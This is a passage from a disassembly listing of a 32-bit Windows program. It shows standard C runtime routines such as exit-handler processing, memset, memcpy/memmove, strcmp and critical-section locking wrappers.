		retn
sub_407CB6	endp


; =============== S U B	R O U T	I N E =======================================



sub_407CED	proc near		; CODE XREF: sub_405DD8+2Dp
					; sub_40F8D4+11Fp

arg_0		= dword	ptr  4

		mov	eax, [esp+arg_0]
		push	esi
		xor	esi, esi
		cmp	eax, esi
		jnz	short loc_407D15

loc_407CF8:				; CODE XREF: sub_407CED+2Ej
		call	sub_405B83
		push	esi
		push	esi
		push	esi
		push	esi
		push	esi
		mov	dword ptr [eax], 16h
		call	sub_4032F9
		add	esp, 14h
		push	16h
		pop	eax
		pop	esi
		retn
; ---------------------------------------------------------------------------

loc_407D15:				; CODE XREF: sub_407CED+9j
		cmp	dword_4275B8, esi
		jz	short loc_407CF8
		mov	ecx, dword_4275C4
		mov	[eax], ecx
		xor	eax, eax
		pop	esi
		retn
sub_407CED	endp


; =============== S U B	R O U T	I N E =======================================



sub_407D29	proc near		; CODE XREF: sub_4044D2-9Bp

arg_0		= dword	ptr  4

		cmp	ds:off_41EDA4, 0
		jz	short loc_407D4C
		push	offset off_41EDA4
		call	sub_40D002
		test	eax, eax
		pop	ecx
		jz	short loc_407D4C
		push	[esp+arg_0]
		call	ds:off_41EDA4
		pop	ecx

loc_407D4C:				; CODE XREF: sub_407D29+7j
					; sub_407D29+16j
		call	sub_40D94E
		push	offset dword_41D2EC
		push	offset dword_41D2D0
		call	sub_407C96
		test	eax, eax
		pop	ecx
		pop	ecx
		jnz	short locret_407DBA
		push	esi
		push	edi
		push	offset sub_40B415
		call	sub_4031E1
		mov	esi, offset dword_41D288
		mov	eax, esi
		mov	edi, offset dword_41D2CC
		cmp	eax, edi
		pop	ecx
		jnb	short loc_407D92

loc_407D83:				; CODE XREF: sub_407D29+67j
		mov	eax, [esi]
		test	eax, eax
		jz	short loc_407D8B
		call	eax

loc_407D8B:				; CODE XREF: sub_407D29+5Ej
		add	esi, 4
		cmp	esi, edi
		jb	short loc_407D83

loc_407D92:				; CODE XREF: sub_407D29+58j
		cmp	dword_436438, 0
		pop	edi
		pop	esi
		jz	short loc_407DB8
		push	offset dword_436438
		call	sub_40D002
		test	eax, eax
		pop	ecx
		jz	short loc_407DB8
		push	0
		push	2
		push	0
		call	dword_436438

loc_407DB8:				; CODE XREF: sub_407D29+72j
					; sub_407D29+81j
		xor	eax, eax

locret_407DBA:				; CODE XREF: sub_407D29+3Bj
		retn
sub_407D29	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_407DBB	proc near		; CODE XREF: sub_407E89+8p
					; sub_407E9A+8p ...

var_1C		= dword	ptr -1Ch
ms_exc		= CPPEH_RECORD ptr -18h
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h

; FUNCTION CHUNK AT 00407E83 SIZE 00000006 BYTES

		push	0Ch
		push	offset dword_421808
		call	__SEH_prolog4
		push	8
		call	sub_405DA7
		pop	ecx
		and	[ebp+ms_exc.disabled], 0
		xor	esi, esi
		inc	esi
		cmp	dword_4275F8, esi
		jz	short loc_407E49
		mov	dword_4275F4, esi
		mov	al, byte ptr [ebp+arg_8]
		mov	byte_4275F0, al
		cmp	[ebp+arg_4], 0
		jnz	short loc_407E39
		push	dword_436430
		call	sub_405543
		mov	edi, eax
		push	dword_43642C
		call	sub_405543
		pop	ecx
		pop	ecx
		mov	[ebp+var_1C], eax
		test	edi, edi
		jz	short loc_407E29

loc_407E13:				; CODE XREF: sub_407DBB+68j
					; sub_407DBB+6Cj
		sub	[ebp+var_1C], 4
		cmp	[ebp+var_1C], edi
		jb	short loc_407E29
		mov	eax, [ebp+var_1C]
		mov	eax, [eax]
		test	eax, eax
		jz	short loc_407E13
		call	eax
		jmp	short loc_407E13
; ---------------------------------------------------------------------------

loc_407E29:				; CODE XREF: sub_407DBB+56j
					; sub_407DBB+5Fj
		push	offset dword_41D2FC
		mov	eax, offset dword_41D2F0
		call	sub_407C7E
		pop	ecx

loc_407E39:				; CODE XREF: sub_407DBB+35j
		push	offset dword_41D308
		mov	eax, offset dword_41D300
		call	sub_407C7E
		pop	ecx

loc_407E49:				; CODE XREF: sub_407DBB+21j
		mov	[ebp+ms_exc.disabled], 0FFFFFFFEh
		call	sub_407E74
		cmp	[ebp+arg_8], 0
		jnz	short loc_407E83
		mov	dword_4275F8, esi
		push	8
		call	sub_405CCF
		pop	ecx
		push	[ebp+arg_0]
		call	sub_407C57

loc_407E71:				; DATA XREF: _1fieagrn:00421820o
		xor	esi, esi
		inc	esi
sub_407DBB	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_407E74	proc near		; CODE XREF: sub_407DBB+95p
		cmp	dword ptr [ebp+10h], 0
		jz	short locret_407E82
		push	8
		call	sub_405CCF
		pop	ecx

locret_407E82:				; CODE XREF: sub_407E74+4j
		retn
sub_407E74	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_407DBB

loc_407E83:				; CODE XREF: sub_407DBB+9Ej
		call	__SEH_epilog4
		retn
; END OF FUNCTION CHUNK	FOR sub_407DBB

; =============== S U B	R O U T	I N E =======================================



sub_407E89	proc near		; CODE XREF: sub_4044D2-5Fp

arg_0		= dword	ptr  4

		push	0
		push	0
		push	[esp+8+arg_0]
		call	sub_407DBB
		add	esp, 0Ch
		retn
sub_407E89	endp


; =============== S U B	R O U T	I N E =======================================



sub_407E9A	proc near		; CODE XREF: .text:004044A3p
					; sub_40E0D9+D9p ...

arg_0		= dword	ptr  4

		push	0
		push	1
		push	[esp+8+arg_0]
		call	sub_407DBB
		add	esp, 0Ch
		retn
sub_407E9A	endp


; =============== S U B	R O U T	I N E =======================================



sub_407EAB	proc near		; CODE XREF: sub_4044D2:loc_404478p
		push	1
		push	0
		push	0
		call	sub_407DBB
		add	esp, 0Ch
		retn
sub_407EAB	endp


; =============== S U B	R O U T	I N E =======================================



sub_407EBA	proc near		; CODE XREF: .text:loc_4044A8p
		push	1
		push	1
		push	0
		call	sub_407DBB
		add	esp, 0Ch
		retn
sub_407EBA	endp


; =============== S U B	R O U T	I N E =======================================



sub_407EC9	proc near		; CODE XREF: sub_405886+C4p
		push	esi
		call	sub_40553A
		mov	esi, eax
		push	esi
		call	sub_408408
		push	esi
		call	sub_40CEAA
		push	esi
		call	sub_4031F3
		push	esi
		call	sub_40E293
		push	esi
		call	sub_40E289
		push	esi
		call	sub_40E07F
		push	esi
		call	nullsub_292
		push	esi
		call	sub_40C28B
		push	offset sub_407E9A
		call	sub_4054D7
		add	esp, 24h
		mov	off_423930, eax
		pop	esi
		retn
sub_407EC9	endp


; =============== S U B	R O U T	I N E =======================================



sub_407F15	proc near		; CODE XREF: sub_4031FD+CEp
					; sub_4032F9+18p ...
		and	dword_436424, 0
		retn
sub_407F15	endp

; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================



sub_407F20	proc near		; CODE XREF: sub_40177B+4Ap
					; sub_40177B+5Ep ...

arg_0		= dword	ptr  4
arg_4		= byte ptr  8
arg_8		= dword	ptr  0Ch

		mov	edx, [esp+arg_8]
		mov	ecx, [esp+arg_0]
		test	edx, edx
		jz	short loc_407F95
		xor	eax, eax
		mov	al, [esp+arg_4]
		test	al, al
		jnz	short loc_407F4C
		cmp	edx, 100h
		jb	short loc_407F4C
		cmp	dword_4352E0, 0
		jz	short loc_407F4C
		jmp	sub_40E2F4
; ---------------------------------------------------------------------------

loc_407F4C:				; CODE XREF: sub_407F20+14j
					; sub_407F20+1Cj ...
		push	edi
		mov	edi, ecx
		cmp	edx, 4
		jb	short loc_407F85
		neg	ecx
		and	ecx, 3
		jz	short loc_407F67
		sub	edx, ecx

loc_407F5D:				; CODE XREF: sub_407F20+45j
		mov	[edi], al
		add	edi, 1
		sub	ecx, 1
		jnz	short loc_407F5D

loc_407F67:				; CODE XREF: sub_407F20+39j
		mov	ecx, eax
		shl	eax, 8
		add	eax, ecx
		mov	ecx, eax
		shl	eax, 10h
		add	eax, ecx
		mov	ecx, edx
		and	edx, 3
		shr	ecx, 2
		jz	short loc_407F85
		rep stosd
		test	edx, edx
		jz	short loc_407F8F

loc_407F85:				; CODE XREF: sub_407F20+32j
					; sub_407F20+5Dj ...
		mov	[edi], al
		add	edi, 1
		sub	edx, 1
		jnz	short loc_407F85

loc_407F8F:				; CODE XREF: sub_407F20+63j
		mov	eax, [esp+4+arg_0]
		pop	edi
		retn
; ---------------------------------------------------------------------------

loc_407F95:				; CODE XREF: sub_407F20+Aj
		mov	eax, [esp+arg_0]
		retn
sub_407F20	endp

; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_407FA0	proc near		; CODE XREF: sub_403332+43p
					; sub_409188+35p ...

arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h

		push	ebp
		mov	ebp, esp
		push	edi
		push	esi
		mov	esi, [ebp+arg_4]
		mov	ecx, [ebp+arg_8]
		mov	edi, [ebp+arg_0]
		mov	eax, ecx
		mov	edx, ecx
		add	eax, esi
		cmp	edi, esi
		jbe	short loc_407FC0
		cmp	edi, eax
		jb	loc_408164

loc_407FC0:				; CODE XREF: sub_407FA0+16j
		cmp	ecx, 100h
		jb	short loc_407FE7
		cmp	dword_4352E0, 0
		jz	short loc_407FE7
		push	edi
		push	esi
		and	edi, 0Fh
		and	esi, 0Fh
		cmp	edi, esi
		pop	esi
		pop	edi
		jnz	short loc_407FE7
		pop	esi
		pop	edi
		pop	ebp
		jmp	sub_40DC1C
; ---------------------------------------------------------------------------

loc_407FE7:				; CODE XREF: sub_407FA0+26j
					; sub_407FA0+2Fj ...
		test	edi, 3
		jnz	short loc_408004
		shr	ecx, 2
		and	edx, 3
		cmp	ecx, 8
		jb	short loc_408024
		rep movsd
		jmp	ds:off_408114[edx*4]
; ---------------------------------------------------------------------------
		align 4

loc_408004:				; CODE XREF: sub_407FA0+4Dj
		mov	eax, edi
		mov	edx, 3
		sub	ecx, 4
		jb	short loc_40801C
		and	eax, 3
		add	ecx, eax
		jmp	dword ptr ds:loc_408024+4[eax*4]
; ---------------------------------------------------------------------------

loc_40801C:				; CODE XREF: sub_407FA0+6Ej
		jmp	dword ptr ds:loc_408124[ecx*4]
; ---------------------------------------------------------------------------
		align 4

loc_408024:				; CODE XREF: sub_407FA0+58j
					; sub_407FA0+B6j ...
		jmp	ds:off_4080A8[ecx*4]
; ---------------------------------------------------------------------------
		align 4
		dd offset loc_408038
		dd offset loc_408064
		dd offset loc_408088
; ---------------------------------------------------------------------------

loc_408038:				; DATA XREF: sub_407FA0+8Co
		and	edx, ecx
		mov	al, [esi]
		mov	[edi], al
		mov	al, [esi+1]
		mov	[edi+1], al
		mov	al, [esi+2]
		shr	ecx, 2
		mov	[edi+2], al
		add	esi, 3
		add	edi, 3
		cmp	ecx, 8
		jb	short loc_408024
		rep movsd
		jmp	ds:off_408114[edx*4]
; ---------------------------------------------------------------------------
		align 4

loc_408064:				; DATA XREF: sub_407FA0+90o
		and	edx, ecx
		mov	al, [esi]
		mov	[edi], al
		mov	al, [esi+1]
		shr	ecx, 2
		mov	[edi+1], al
		add	esi, 2
		add	edi, 2
		cmp	ecx, 8
		jb	short loc_408024
		rep movsd
		jmp	ds:off_408114[edx*4]
; ---------------------------------------------------------------------------
		align 4

loc_408088:				; DATA XREF: sub_407FA0+94o
		and	edx, ecx
		mov	al, [esi]
		mov	[edi], al
		add	esi, 1
		shr	ecx, 2
		add	edi, 1
		cmp	ecx, 8
		jb	short loc_408024
		rep movsd
		jmp	ds:off_408114[edx*4]
; ---------------------------------------------------------------------------
		align 4
off_4080A8	dd offset loc_40810B	; DATA XREF: sub_407FA0:loc_408024r
		dd offset loc_4080F8
		dd offset loc_4080F0
		dd offset loc_4080E8
		dd offset loc_4080E0
		dd offset loc_4080D8
		dd offset loc_4080D0
		dd offset loc_4080C8
; ---------------------------------------------------------------------------

loc_4080C8:				; CODE XREF: sub_407FA0:loc_408024j
					; DATA XREF: sub_407FA0+124o
		mov	eax, [esi+ecx*4-1Ch]
		mov	[edi+ecx*4-1Ch], eax

loc_4080D0:				; CODE XREF: sub_407FA0:loc_408024j
					; DATA XREF: sub_407FA0+120o
		mov	eax, [esi+ecx*4-18h]
		mov	[edi+ecx*4-18h], eax

loc_4080D8:				; CODE XREF: sub_407FA0:loc_408024j
					; DATA XREF: sub_407FA0+11Co
		mov	eax, [esi+ecx*4-14h]
		mov	[edi+ecx*4-14h], eax

loc_4080E0:				; CODE XREF: sub_407FA0:loc_408024j
					; DATA XREF: sub_407FA0+118o
		mov	eax, [esi+ecx*4-10h]
		mov	[edi+ecx*4-10h], eax

loc_4080E8:				; CODE XREF: sub_407FA0:loc_408024j
					; DATA XREF: sub_407FA0+114o
		mov	eax, [esi+ecx*4-0Ch]
		mov	[edi+ecx*4-0Ch], eax

loc_4080F0:				; CODE XREF: sub_407FA0:loc_408024j
					; DATA XREF: sub_407FA0+110o
		mov	eax, [esi+ecx*4-8]
		mov	[edi+ecx*4-8], eax

loc_4080F8:				; CODE XREF: sub_407FA0:loc_408024j
					; DATA XREF: sub_407FA0+10Co
		mov	eax, [esi+ecx*4-4]
		mov	[edi+ecx*4-4], eax
		lea	eax, ds:0[ecx*4]
		add	esi, eax
		add	edi, eax

loc_40810B:				; CODE XREF: sub_407FA0:loc_408024j
					; DATA XREF: sub_407FA0:off_4080A8o
		jmp	ds:off_408114[edx*4]
; ---------------------------------------------------------------------------
		align 4
off_408114	dd offset loc_408124	; DATA XREF: sub_407FA0+5Cr
					; sub_407FA0+BAr ...
		dd offset loc_40812C
		dd offset loc_408138
		dd offset loc_40814C
; ---------------------------------------------------------------------------

loc_408124:				; CODE XREF: sub_407FA0+5Cj
					; sub_407FA0+BAj ...
		mov	eax, [ebp+arg_0]
		pop	esi
		pop	edi
		leave
		retn
; ---------------------------------------------------------------------------
		align 4

loc_40812C:				; CODE XREF: sub_407FA0+5Cj
					; sub_407FA0+BAj ...
		mov	al, [esi]
		mov	[edi], al
		mov	eax, [ebp+arg_0]
		pop	esi
		pop	edi
		leave
		retn
; ---------------------------------------------------------------------------
		align 4

loc_408138:				; CODE XREF: sub_407FA0+5Cj
					; sub_407FA0+BAj ...
		mov	al, [esi]
		mov	[edi], al
		mov	al, [esi+1]
		mov	[edi+1], al
		mov	eax, [ebp+arg_0]
		pop	esi
		pop	edi
		leave
		retn
; ---------------------------------------------------------------------------
		align 4

loc_40814C:				; CODE XREF: sub_407FA0+5Cj
					; sub_407FA0+BAj ...
		mov	al, [esi]
		mov	[edi], al
		mov	al, [esi+1]
		mov	[edi+1], al
		mov	al, [esi+2]
		mov	[edi+2], al
		mov	eax, [ebp+arg_0]
		pop	esi
		pop	edi
		leave
		retn
; ---------------------------------------------------------------------------
		align 4

loc_408164:				; CODE XREF: sub_407FA0+1Aj
		lea	esi, [ecx+esi-4]
		lea	edi, [ecx+edi-4]
		test	edi, 3
		jnz	short loc_408198
		shr	ecx, 2
		and	edx, 3
		cmp	ecx, 8
		jb	short loc_40818C
		std
		rep movsd
		cld
		jmp	ds:off_4082B0[edx*4]
; ---------------------------------------------------------------------------
		align 4

loc_40818C:				; CODE XREF: sub_407FA0+1DDj
					; sub_407FA0+238j ...
		neg	ecx
		jmp	ds:off_408260[ecx*4]
; ---------------------------------------------------------------------------
		align 4

loc_408198:				; CODE XREF: sub_407FA0+1D2j
		mov	eax, edi
		mov	edx, 3
		cmp	ecx, 4
		jb	short loc_4081B0
		and	eax, 3
		sub	ecx, eax
		jmp	dword ptr ds:loc_4081B0+4[eax*4]
; ---------------------------------------------------------------------------

loc_4081B0:				; CODE XREF: sub_407FA0+202j
					; DATA XREF: sub_407FA0+209r
		jmp	ds:off_4082B0[ecx*4]
; ---------------------------------------------------------------------------
		align 4
		dd offset loc_4081C4
		dd offset loc_4081E8
		dd offset loc_408210
; ---------------------------------------------------------------------------

loc_4081C4:				; DATA XREF: sub_407FA0+218o
		mov	al, [esi+3]
		and	edx, ecx
		mov	[edi+3], al
		sub	esi, 1
		shr	ecx, 2
		sub	edi, 1
		cmp	ecx, 8
		jb	short loc_40818C
		std
		rep movsd
		cld
		jmp	ds:off_4082B0[edx*4]
; ---------------------------------------------------------------------------
		align 4

loc_4081E8:				; DATA XREF: sub_407FA0+21Co
		mov	al, [esi+3]
		and	edx, ecx
		mov	[edi+3], al
		mov	al, [esi+2]
		shr	ecx, 2
		mov	[edi+2], al
		sub	esi, 2
		sub	edi, 2
		cmp	ecx, 8
		jb	short loc_40818C
		std
		rep movsd
		cld
		jmp	ds:off_4082B0[edx*4]
; ---------------------------------------------------------------------------
		align 10h

loc_408210:				; DATA XREF: sub_407FA0+220o
		mov	al, [esi+3]
		and	edx, ecx
		mov	[edi+3], al
		mov	al, [esi+2]
		mov	[edi+2], al
		mov	al, [esi+1]
		shr	ecx, 2
		mov	[edi+1], al
		sub	esi, 3
		sub	edi, 3
		cmp	ecx, 8
		jb	loc_40818C
		std
		rep movsd
		cld
		jmp	ds:off_4082B0[edx*4]
; ---------------------------------------------------------------------------
		align 4
		dd offset loc_408264
		dd offset loc_40826C
		dd offset loc_408274
		dd offset loc_40827C
		dd offset loc_408284
		dd offset loc_40828C
		dd offset loc_408294
off_408260	dd offset loc_4082A7	; DATA XREF: sub_407FA0+1EEr
; ---------------------------------------------------------------------------

loc_408264:				; DATA XREF: sub_407FA0+2A4o
		mov	eax, [esi+ecx*4+1Ch]
		mov	[edi+ecx*4+1Ch], eax

loc_40826C:				; DATA XREF: sub_407FA0+2A8o
		mov	eax, [esi+ecx*4+18h]
		mov	[edi+ecx*4+18h], eax

loc_408274:				; DATA XREF: sub_407FA0+2ACo
		mov	eax, [esi+ecx*4+14h]
		mov	[edi+ecx*4+14h], eax

loc_40827C:				; DATA XREF: sub_407FA0+2B0o
		mov	eax, [esi+ecx*4+10h]
		mov	[edi+ecx*4+10h], eax

loc_408284:				; DATA XREF: sub_407FA0+2B4o
		mov	eax, [esi+ecx*4+0Ch]
		mov	[edi+ecx*4+0Ch], eax

loc_40828C:				; DATA XREF: sub_407FA0+2B8o
		mov	eax, [esi+ecx*4+8]
		mov	[edi+ecx*4+8], eax

loc_408294:				; DATA XREF: sub_407FA0+2BCo
		mov	eax, [esi+ecx*4+4]
		mov	[edi+ecx*4+4], eax
		lea	eax, ds:0[ecx*4]
		add	esi, eax
		add	edi, eax

loc_4082A7:				; CODE XREF: sub_407FA0+1EEj
					; DATA XREF: sub_407FA0:off_408260o
		jmp	ds:off_4082B0[edx*4]
; ---------------------------------------------------------------------------
		align 10h
off_4082B0	dd offset loc_4082C0	; DATA XREF: sub_407FA0+1E3r
					; sub_407FA0:loc_4081B0r ...
		dd offset loc_4082C8
		dd offset loc_4082D8
		dd offset loc_4082EC
; ---------------------------------------------------------------------------

loc_4082C0:				; CODE XREF: sub_407FA0+1E3j
					; sub_407FA0:loc_4081B0j ...
		mov	eax, [ebp+arg_0]
		pop	esi
		pop	edi
		leave
		retn
; ---------------------------------------------------------------------------
		align 4

loc_4082C8:				; CODE XREF: sub_407FA0+1E3j
					; sub_407FA0:loc_4081B0j ...
		mov	al, [esi+3]
		mov	[edi+3], al
		mov	eax, [ebp+arg_0]
		pop	esi
		pop	edi
		leave
		retn
; ---------------------------------------------------------------------------
		align 4

loc_4082D8:				; CODE XREF: sub_407FA0+1E3j
					; sub_407FA0:loc_4081B0j ...
		mov	al, [esi+3]
		mov	[edi+3], al
		mov	al, [esi+2]
		mov	[edi+2], al
		mov	eax, [ebp+arg_0]
		pop	esi
		pop	edi
		leave
		retn
; ---------------------------------------------------------------------------
		align 4

loc_4082EC:				; CODE XREF: sub_407FA0+1E3j
					; sub_407FA0:loc_4081B0j ...
		mov	al, [esi+3]
		mov	[edi+3], al
		mov	al, [esi+2]
		mov	[edi+2], al
		mov	al, [esi+1]
		mov	[edi+1], al
		mov	eax, [ebp+arg_0]
		pop	esi
		pop	edi
		leave
		retn
sub_407FA0	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_408305	proc near		; CODE XREF: sub_4033AD+7p

var_1C		= dword	ptr -1Ch
ms_exc		= CPPEH_RECORD ptr -18h
arg_0		= dword	ptr  8

		push	0Ch
		push	offset dword_421828
		call	__SEH_prolog4
		push	0Eh
		call	sub_405DA7
		pop	ecx
		and	[ebp+ms_exc.disabled], 0
		mov	esi, [ebp+arg_0]
		mov	ecx, [esi+4]
		test	ecx, ecx
		jz	short loc_408356
		mov	eax, dword_427600
		mov	edx, offset dword_4275FC

loc_408331:				; CODE XREF: sub_408305+65j
		mov	[ebp+var_1C], eax
		test	eax, eax
		jz	short loc_408349
		cmp	[eax], ecx
		jnz	short loc_408368
		mov	ecx, [eax+4]
		mov	[edx+4], ecx
		push	eax
		call	sub_4039C3
		pop	ecx

loc_408349:				; CODE XREF: sub_408305+31j
		push	dword ptr [esi+4]
		call	sub_4039C3
		pop	ecx
		and	dword ptr [esi+4], 0

loc_408356:				; CODE XREF: sub_408305+20j
		mov	[ebp+ms_exc.disabled], 0FFFFFFFEh
		call	sub_40836C
		call	__SEH_epilog4
		retn
; ---------------------------------------------------------------------------

loc_408368:				; CODE XREF: sub_408305+35j
		mov	edx, eax
		jmp	short loc_408331
sub_408305	endp


; =============== S U B	R O U T	I N E =======================================



sub_40836C	proc near		; CODE XREF: sub_408305+58p
					; DATA XREF: _1fieagrn:00421840o
		push	0Eh
		call	sub_405CCF
		pop	ecx
		retn
sub_40836C	endp

; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================



sub_408380	proc near		; CODE XREF: sub_4033D7+Cp
					; sub_40B5AB+25p

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

		mov	edx, [esp+arg_0]
		mov	ecx, [esp+arg_4]
		test	edx, 3
		jnz	short loc_4083CC

loc_408390:				; CODE XREF: sub_408380+3Cj
					; sub_408380+6Aj ...
		mov	eax, [edx]
		cmp	al, [ecx]
		jnz	short loc_4083C4
		or	al, al
		jz	short loc_4083C0
		cmp	ah, [ecx+1]
		jnz	short loc_4083C4
		or	ah, ah
		jz	short loc_4083C0
		shr	eax, 10h
		cmp	al, [ecx+2]
		jnz	short loc_4083C4
		or	al, al
		jz	short loc_4083C0
		cmp	ah, [ecx+3]
		jnz	short loc_4083C4
		add	ecx, 4
		add	edx, 4
		or	ah, ah
		jnz	short loc_408390
		mov	edi, edi

loc_4083C0:				; CODE XREF: sub_408380+18j
					; sub_408380+21j ...
		xor	eax, eax
		retn
; ---------------------------------------------------------------------------
		align 4

loc_4083C4:				; CODE XREF: sub_408380+14j
					; sub_408380+1Dj ...
		sbb	eax, eax
		shl	eax, 1
		add	eax, 1
		retn
; ---------------------------------------------------------------------------

loc_4083CC:				; CODE XREF: sub_408380+Ej
		test	edx, 1
		jz	short loc_4083EC
		mov	al, [edx]
		add	edx, 1
		cmp	al, [ecx]
		jnz	short loc_4083C4
		add	ecx, 1
		or	al, al
		jz	short loc_4083C0
		test	edx, 2
		jz	short loc_408390

loc_4083EC:				; CODE XREF: sub_408380+52j
		mov	ax, [edx]
		add	edx, 2
		cmp	al, [ecx]
		jnz	short loc_4083C4
		or	al, al
		jz	short loc_4083C0
		cmp	ah, [ecx+1]
		jnz	short loc_4083C4
		or	ah, ah
		jz	short loc_4083C0
		add	ecx, 2
		jmp	short loc_408390
sub_408380	endp


; =============== S U B	R O U T	I N E =======================================



sub_408408	proc near		; CODE XREF: sub_407EC9+9p

arg_0		= dword	ptr  4

		mov	eax, [esp+arg_0]
		mov	dword_427604, eax
		retn
sub_408408	endp


; =============== S U B	R O U T	I N E =======================================



sub_408412	proc near		; CODE XREF: sub_40340B+Bp
					; sub_403AA0+8Cp ...

arg_0		= dword	ptr  4

		push	dword_427604
		call	sub_405543
		test	eax, eax
		pop	ecx
		jz	short loc_408431
		push	[esp+arg_0]
		call	eax ; sub_41C8D9
		test	eax, eax
		pop	ecx
		jz	short loc_408431
		xor	eax, eax
		inc	eax
		retn
; ---------------------------------------------------------------------------

loc_408431:				; CODE XREF: sub_408412+Ej
					; sub_408412+19j
		xor	eax, eax
		retn
sub_408412	endp


; =============== S U B	R O U T	I N E =======================================



sub_408434	proc near		; CODE XREF: sub_406B86+76p
					; sub_406B86+82p ...
		mov	eax, offset off_423950
		retn
sub_408434	endp


; =============== S U B	R O U T	I N E =======================================



sub_40843A	proc near		; DATA XREF: _1fieagrn:0041D2DCo
		mov	eax, dword_436420
		test	eax, eax
		push	esi
		push	14h
		pop	esi
		jnz	short loc_40844E
		mov	eax, 200h
		jmp	short loc_408454
; ---------------------------------------------------------------------------

loc_40844E:				; CODE XREF: sub_40843A+Bj
		cmp	eax, esi
		jge	short loc_408459
		mov	eax, esi

loc_408454:				; CODE XREF: sub_40843A+12j
		mov	dword_436420, eax

loc_408459:				; CODE XREF: sub_40843A+16j
		push	4
		push	eax
		call	sub_407B2A
		test	eax, eax
		pop	ecx
		pop	ecx
		mov	dword_435400, eax
		jnz	short loc_40848A
		push	4
		push	esi
		mov	dword_436420, esi
		call	sub_407B2A
		test	eax, eax
		pop	ecx
		pop	ecx
		mov	dword_435400, eax
		jnz	short loc_40848A
		push	1Ah
		pop	eax
		pop	esi
		retn
; ---------------------------------------------------------------------------

loc_40848A:				; CODE XREF: sub_40843A+30j
					; sub_40843A+49j
		xor	edx, edx
		mov	ecx, offset off_423950
		jmp	short loc_408498
; ---------------------------------------------------------------------------

loc_408493:				; CODE XREF: sub_40843A+6Dj
		mov	eax, dword_435400

loc_408498:				; CODE XREF: sub_40843A+57j
		mov	[edx+eax], ecx
		add	ecx, 20h
		add	edx, 4
		cmp	ecx, offset dword_423BD0
		jl	short loc_408493
		push	0FFFFFFFEh
		pop	esi
		xor	edx, edx
		mov	ecx, offset dword_423960
		push	edi

loc_4084B4:				; CODE XREF: sub_40843A+AAj
		mov	edi, edx
		and	edi, 1Fh
		imul	edi, 28h
		mov	eax, edx
		sar	eax, 5
		mov	eax, dword_435300[eax*4]
		mov	eax, [edi+eax]
		cmp	eax, 0FFFFFFFFh
		jz	short loc_4084D8
		cmp	eax, esi
		jz	short loc_4084D8
		test	eax, eax
		jnz	short loc_4084DA

loc_4084D8:				; CODE XREF: sub_40843A+94j
					; sub_40843A+98j
		mov	[ecx], esi

loc_4084DA:				; CODE XREF: sub_40843A+9Cj
		add	ecx, 20h
		inc	edx
		cmp	ecx, offset dword_4239C0
		jl	short loc_4084B4
		pop	edi
		xor	eax, eax
		pop	esi
		retn
sub_40843A	endp


; =============== S U B	R O U T	I N E =======================================



sub_4084EB	proc near		; DATA XREF: _1fieagrn:0041D2F8o
		call	sub_409108
		cmp	byte_4275F0, 0
		jz	short loc_4084FE
		call	sub_40E383

loc_4084FE:				; CODE XREF: sub_4084EB+Cj
		push	dword_435400
		call	sub_4039C3
		pop	ecx
		retn
sub_4084EB	endp


; =============== S U B	R O U T	I N E =======================================



sub_40850B	proc near		; CODE XREF: sub_4035C7+4Fp
					; sub_403884+50p ...

arg_0		= dword	ptr  4

		mov	eax, [esp+arg_0]
		mov	ecx, offset off_423950
		cmp	eax, ecx
		jb	short loc_40852F
		cmp	eax, offset dword_423BB0
		ja	short loc_40852F
		sub	eax, ecx
		sar	eax, 5
		add	eax, 10h
		push	eax
		call	sub_405DA7
		pop	ecx
		retn
; ---------------------------------------------------------------------------

loc_40852F:				; CODE XREF: sub_40850B+Bj
					; sub_40850B+12j
		add	eax, 20h
		push	eax
		call	ds:dword_41D164	; RtlEnterCriticalSection
		retn
sub_40850B	endp


; =============== S U B	R O U T	I N E =======================================



sub_40853A	proc near		; CODE XREF: sub_408851+66p
					; sub_40902E+46p

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

		mov	eax, [esp+arg_0]
		cmp	eax, 14h
		jge	short loc_40854E
		add	eax, 10h
		push	eax
		call	sub_405DA7
		pop	ecx
		retn
; ---------------------------------------------------------------------------

loc_40854E:				; CODE XREF: sub_40853A+7j
		mov	eax, [esp+arg_4]
		add	eax, 20h
		push	eax
		call	ds:dword_41D164	; RtlEnterCriticalSection
		retn
sub_40853A	endp


; =============== S U B	R O U T	I N E =======================================



sub_40855D	proc near		; CODE XREF: sub_4035AA+3p
					; sub_40370C+3p ...

arg_0		= dword	ptr  4

		mov	eax, [esp+arg_0]
		mov	ecx, offset off_423950
		cmp	eax, ecx
		jb	short loc_408581
		cmp	eax, offset dword_423BB0
		ja	short loc_408581
		sub	eax, ecx
		sar	eax, 5
		add	eax, 10h
		push	eax
		call	sub_405CCF
		pop	ecx
		retn
; ---------------------------------------------------------------------------

loc_408581:				; CODE XREF: sub_40855D+Bj
					; sub_40855D+12j
		add	eax, 20h
		push	eax
		call	ds:dword_41D168	; RtlLeaveCriticalSection
		retn
sub_40855D	endp


; =============== S U B	R O U T	I N E =======================================



sub_40858C	proc near		; CODE XREF: sub_408851+7Dp
					; sub_4090D0+9p

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

		mov	eax, [esp+arg_0]
		cmp	eax, 14h
		jge	short loc_4085A0
		add	eax, 10h
		push	eax
		call	sub_405CCF
		pop	ecx
		retn
; ---------------------------------------------------------------------------

loc_4085A0:				; CODE XREF: sub_40858C+7j
		mov	eax, [esp+arg_4]
		add	eax, 20h
		push	eax
		call	ds:dword_41D168	; RtlLeaveCriticalSection
		retn
sub_40858C	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_4085AF	proc near		; CODE XREF: sub_4034F0+9Ap

var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
